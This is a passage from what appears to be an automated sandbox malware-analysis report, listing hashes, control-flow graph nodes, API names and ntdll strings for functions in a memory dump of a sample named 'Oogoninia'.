                                                                                                                                                                                    • Instruction Fuzzy Hash: BC90023124140402D600615D5A1C78700454BD0312F51C816A5254515ED675C9997531
                                                                                                                                                                                    Function 32562E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 3321a96339df36536206c7091345e412341bd04bc76217ed2c0d777a9ebe3eb5
                                                                                                                                                                                    • Instruction ID: 41c375b6ee40121d0334fc82e0031cf271b8bc06aa0fa5d20b0942e534141dfc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3321a96339df36536206c7091345e412341bd04bc76217ed2c0d777a9ebe3eb5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5490026125100042D604615D561874600854BE1211F51C817A2244514CD5398D697125
                                                                                                                                                                                    Function 32562F00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: f9090d386601709f99be94e5859f5c37b770db482d34425c40b5dc18991c02b0
                                                                                                                                                                                    • Instruction ID: d4601e9c9d6c6d358b19d4773f028dd6eb09f943659323c367d124f4cdcef7d9
                                                                                                                                                                                    • Opcode Fuzzy Hash: f9090d386601709f99be94e5859f5c37b770db482d34425c40b5dc18991c02b0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E90022125180042D700656D5E28B4700454BD0313F51C91AA0244514CD92589697521
                                                                                                                                                                                    Function 32562F30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c0475b7a59f6218d961060f5023f9e46c2ad027e54bd7df14aaa967baf41b510
                                                                                                                                                                                    • Instruction ID: 1733763710d7f22754eb741a32eefaef1dc9a62f2831f9f37eba1b2bd5199f2d
                                                                                                                                                                                    • Opcode Fuzzy Hash: c0475b7a59f6218d961060f5023f9e46c2ad027e54bd7df14aaa967baf41b510
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7090022124144442D640625D5A18B4F41454BE1212F91C81EA4246514CD925895D7721
                                                                                                                                                                                    Function 32562FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 1d0a19c2b78d0dc411141d219c2bec65f95554a4605c57ff5b332ed6697ee4ea
                                                                                                                                                                                    • Instruction ID: a7fb5e12e198d137de11a8233246f4d934c76713a463871443156984e802b232
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d0a19c2b78d0dc411141d219c2bec65f95554a4605c57ff5b332ed6697ee4ea
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F90022128100802D640715D962874700468BD0611F51C816A0114514DD6268A6D76B1
                                                                                                                                                                                    Function 32562C50 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: c0914a8a8e21997337aca70f2fae0d6b6dcb23709e0788cbc11d69c5f6fe680a
                                                                                                                                                                                    • Instruction ID: 4976264ff419bc56e847e60af7629c36f9dc0d24cabb9304c5005745e40582af
                                                                                                                                                                                    • Opcode Fuzzy Hash: c0914a8a8e21997337aca70f2fae0d6b6dcb23709e0788cbc11d69c5f6fe680a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A90022134100003D640715D662C64640459BE1311F51D816E0504514CE925895E7222
                                                                                                                                                                                    Function 32562C10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5cb4e5e6a9b8a5800364aef02590123a9e96d7bb9c3e331c8186baeecfb67dae
                                                                                                                                                                                    • Instruction ID: 8ba5d7cc4975c7c8f5e11b6d4094204d49f9e4fcca873e469edfe86b1ed1fe1c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cb4e5e6a9b8a5800364aef02590123a9e96d7bb9c3e331c8186baeecfb67dae
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E90023124100403D600615D671C74700454BD0211F51DC16A0514518DE66689597121
                                                                                                                                                                                    Function 32563C30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 09eb146810eb4f3ee03f9bfc0f2e7b7676c8d5a04d25e1daa2bc389932652c81
                                                                                                                                                                                    • Instruction ID: 0baf19b51c0508444ee6bbfef8c966da171df72896ae72ac21ccc60049c892d8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 09eb146810eb4f3ee03f9bfc0f2e7b7676c8d5a04d25e1daa2bc389932652c81
                                                                                                                                                                                    • Instruction Fuzzy Hash: EB900231242001429A40625D6A18A8E41454BE1312B91DC1AA0105514CD92489697221
                                                                                                                                                                                    Function 32562C30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 71829930be2dfbe174bbdc6a9c08b4b8d161807df773d69a78f0c7963b79131c
                                                                                                                                                                                    • Instruction ID: bb19839817d4e6195b9a0065df051077960df7557407a3ad0e2062ad674e664d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 71829930be2dfbe174bbdc6a9c08b4b8d161807df773d69a78f0c7963b79131c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2890022925300002D680715D661C64A00454BD1212F91DC1AA0105518CD925896D7321
                                                                                                                                                                                    Function 32562C20 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5d4257970b443e9e834722456b5bdf8999e34d2999944ea834d548b6a78682b1
                                                                                                                                                                                    • Instruction ID: 00c0a487aaa8b0906b02974059fa7827c81c93b1f26d551232d37793717e3862
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d4257970b443e9e834722456b5bdf8999e34d2999944ea834d548b6a78682b1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1190022124504442D600655D661CA4600454BD0215F51D816A1154555DD6358959B131
                                                                                                                                                                                    Function 32562CD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: fd866855fa897842c1424650af38e5a5aeac52432b27dab51d9a19786d05e8ff
                                                                                                                                                                                    • Instruction ID: 0698edb8e2c9d74ac16cf1127fa51626d64611dfc62b7cd6eb9bcc420aeec519
                                                                                                                                                                                    • Opcode Fuzzy Hash: fd866855fa897842c1424650af38e5a5aeac52432b27dab51d9a19786d05e8ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C90023128100402D641715D561864600495BD0251F91C817A0514514ED6658B5EBA61
                                                                                                                                                                                    Function 32562CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 47ac63de61a0f331a383e818799732ac872ee1747ad43bcb13939f75ad0ed005
                                                                                                                                                                                    • Instruction ID: 303f0523ad7ce54499020b0ac271c0452c8dc829649cc09c2360d9399f951ab4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 47ac63de61a0f331a383e818799732ac872ee1747ad43bcb13939f75ad0ed005
                                                                                                                                                                                    • Instruction Fuzzy Hash: D5900221282041525A45B15D561854740465BE0251791C817A1504910CD536995EF621
                                                                                                                                                                                    Function 32563C90 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 5a041473312d0bf604802677ef1da49a7ea22827bf7c2ed124b7d853524e9f82
                                                                                                                                                                                    • Instruction ID: 393a52c5af5fd125b9881a2b99ecb952d273e462068c4e845e0f6566798c844b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a041473312d0bf604802677ef1da49a7ea22827bf7c2ed124b7d853524e9f82
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A90023524100402DA10615D6A1868600864BD0311F51DC16A0514518DD66489A9B121
                                                                                                                                                                                    Function 32562D50 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 834a483db091ffa596df9f81c45cb2c308f20209eb5fc2ba9b3cb4c44f0093a6
                                                                                                                                                                                    • Instruction ID: 3089fcd833310bd8b4be97938930213752058439991f12cf89eeb5c60f39f35b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 834a483db091ffa596df9f81c45cb2c308f20209eb5fc2ba9b3cb4c44f0093a6
                                                                                                                                                                                    • Instruction Fuzzy Hash: C690022134100402D602615D562864600498BD1355F91C817E1514515DD6358A5BB132
                                                                                                                                                                                    Function 32562B20 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                    • Instruction ID: 93754563f26cf7687a04ec7739928ae66d86da5565e6ebc4de703dc5b6e8a5f8
                                                                                                                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                    Function 325FA1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 883 325fa1f0-325fa269 call 32532330 * 2 RtlDebugPrintTimes 889 325fa41f-325fa444 call 325324d0 * 2 call 32564b50 883->889 890 325fa26f-325fa27a 883->890 892 325fa27c-325fa289 890->892 893 325fa2a4 890->893 896 325fa28f-325fa295 892->896 897 325fa28b-325fa28d 892->897 894 325fa2a8-325fa2b4 893->894 898 325fa2c1-325fa2c3 894->898 900 325fa29b-325fa2a2 896->900 901 325fa373-325fa375 896->901 897->896 902 325fa2b6-325fa2bc 898->902 903 325fa2c5-325fa2c7 898->903 900->894 904 325fa39f-325fa3a1 901->904 906 325fa2be 902->906 907 325fa2cc-325fa2d0 902->907 903->904 908 325fa3a7-325fa3b4 904->908 909 325fa2d5-325fa2fd RtlDebugPrintTimes 904->909 906->898 912 325fa3ec-325fa3ee 907->912 913 325fa3da-325fa3e6 908->913 914 325fa3b6-325fa3c3 908->914 909->889 921 325fa303-325fa320 RtlDebugPrintTimes 909->921 912->904 915 325fa3fb-325fa3fd 913->915 917 325fa3cb-325fa3d1 914->917 918 325fa3c5-325fa3c9 914->918 919 325fa3ff-325fa401 915->919 920 325fa3f0-325fa3f6 915->920 922 325fa4eb-325fa4ed 917->922 923 325fa3d7 917->923 918->917 924 325fa403-325fa409 919->924 925 325fa3f8 920->925 926 325fa447-325fa44b 920->926 921->889 931 325fa326-325fa34c RtlDebugPrintTimes 921->931 922->924 923->913 928 325fa40b-325fa41d RtlDebugPrintTimes 924->928 929 325fa450-325fa474 RtlDebugPrintTimes 924->929 925->915 927 325fa51f-325fa521 926->927 928->889 929->889 934 325fa476-325fa493 RtlDebugPrintTimes 929->934 931->889 936 325fa352-325fa354 931->936 934->889 943 325fa495-325fa4c4 RtlDebugPrintTimes 934->943 937 325fa377-325fa38a 936->937 938 325fa356-325fa363 936->938 942 325fa397-325fa399 937->942 940 325fa36b-325fa371 938->940 941 325fa365-325fa369 938->941 940->901 940->937 941->940 944 325fa38c-325fa392 942->944 945 325fa39b-325fa39d 942->945 943->889 949 325fa4ca-325fa4cc 943->949 946 325fa3e8-325fa3ea 944->946 947 325fa394 944->947 945->904 946->912 947->942 950 325fa4ce-325fa4db 949->950 951 325fa4f2-325fa505 949->951 953 325fa4dd-325fa4e1 950->953 954 325fa4e3-325fa4e9 950->954 952 325fa512-325fa514 951->952 955 325fa507-325fa50d 952->955 956 325fa516 952->956 953->954 954->922 954->951 957 325fa50f 955->957 958 325fa51b-325fa51d 955->958 956->919 957->952 958->927
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: HEAP:
                                                                                                                                                                                    • API String ID: 3446177414-2466845122
                                                                                                                                                                                    • Opcode ID: 6a91c05e633434382764b843e345fa485929e229a213dca1beeb35f258cf0060
                                                                                                                                                                                    • Instruction ID: e707ddc3f0aa39952ca111e4b0736988f2d2e5649475a76a69ffe94a8d06ad0a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a91c05e633434382764b843e345fa485929e229a213dca1beeb35f258cf0060
                                                                                                                                                                                    • Instruction Fuzzy Hash: E8A1DD71614311EFD705CE18C894A1ABBE2FF88B54F04492DEA45DB350EB32EE45CB92
                                                                                                                                                                                    Function 32557550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 959 32557550-32557571 960 32557573-3255758f call 3252e580 959->960 961 325575ab-325575b9 call 32564b50 959->961 966 32557595-325575a2 960->966 967 32594443 960->967 968 325575a4 966->968 969 325575ba-325575c9 call 32557738 966->969 970 3259444a-32594450 967->970 968->961 975 32557621-3255762a 969->975 976 325575cb-325575e1 call 325576ed 969->976 972 325575e7-325575f0 call 32557648 970->972 973 32594456-325944c3 call 325aef10 call 32568f40 RtlDebugPrintTimes BaseQueryModuleData 970->973 972->975 984 325575f2 972->984 973->972 991 325944c9-325944d1 973->991 982 325575f8-32557601 975->982 976->970 976->972 986 32557603-32557612 call 3255763b 982->986 987 3255762c-3255762e 982->987 984->982 988 32557614-32557616 986->988 987->988 993 32557630-32557639 988->993 994 32557618-3255761a 988->994 991->972 995 325944d7-325944de 991->995 993->994 994->968 996 3255761c 994->996 995->972 997 325944e4-325944ef 995->997 998 325945c9-325945db call 32562b70 996->998 1000 325944f5-3259452e call 325aef10 call 3256a9c0 997->1000 1001 325945c4 call 32564c68 997->1001 998->968 1008 32594530-32594541 call 325aef10 1000->1008 1009 32594546-32594576 call 325aef10 1000->1009 1001->998 1008->975 1009->972 1014 3259457c-3259458a call 3256a690 1009->1014 1017 3259458c-3259458e 1014->1017 1018 32594591-325945ae call 325aef10 call 3259cc1e 1014->1018 1017->1018 1018->972 1023 325945b4-325945bd 1018->1023 1023->1014 1024 325945bf 1023->1024 1024->972
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32594530
                                                                                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 32594507
                                                                                                                                                                                    • ExecuteOptions, xrefs: 325944AB
                                                                                                                                                                                    • Execute=1, xrefs: 3259451E
                                                                                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3259454D
                                                                                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32594460
                                                                                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 32594592
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                    • API String ID: 0-484625025
                                                                                                                                                                                    • Opcode ID: d7d3c252966d415fb04b9478ada10794971ba67cbb93f20b6db7c09999e1282a
                                                                                                                                                                                    • Instruction ID: d19b518ccdb30d4d29ae8006a0a4e4f87be051a464cd5a19c3b6c9f587c283c3
                                                                                                                                                                                    • Opcode Fuzzy Hash: d7d3c252966d415fb04b9478ada10794971ba67cbb93f20b6db7c09999e1282a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 91512871A003197BEB119AA4DC95FED77E8EF48345F5004EAD906A7180EB70AF41CF50
                                                                                                                                                                                    Function 3253A170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Actx , xrefs: 32587819, 32587880
                                                                                                                                                                                    • SsHd, xrefs: 3253A304
                                                                                                                                                                                    • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 325877E2
                                                                                                                                                                                    • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 325878F3
                                                                                                                                                                                    • RtlpFindActivationContextSection_CheckParameters, xrefs: 325877DD, 32587802
                                                                                                                                                                                    • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32587807
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                                                                                    • API String ID: 0-1988757188
                                                                                                                                                                                    • Opcode ID: a9a25c7982c7f677d095af0e740fde0e728a12566e7dc147738a1e36af69007d
                                                                                                                                                                                    • Instruction ID: ab1559e2e5f85283f058d38000195efc5c069bfd28ef26a82b8eadb1b6ca42f8
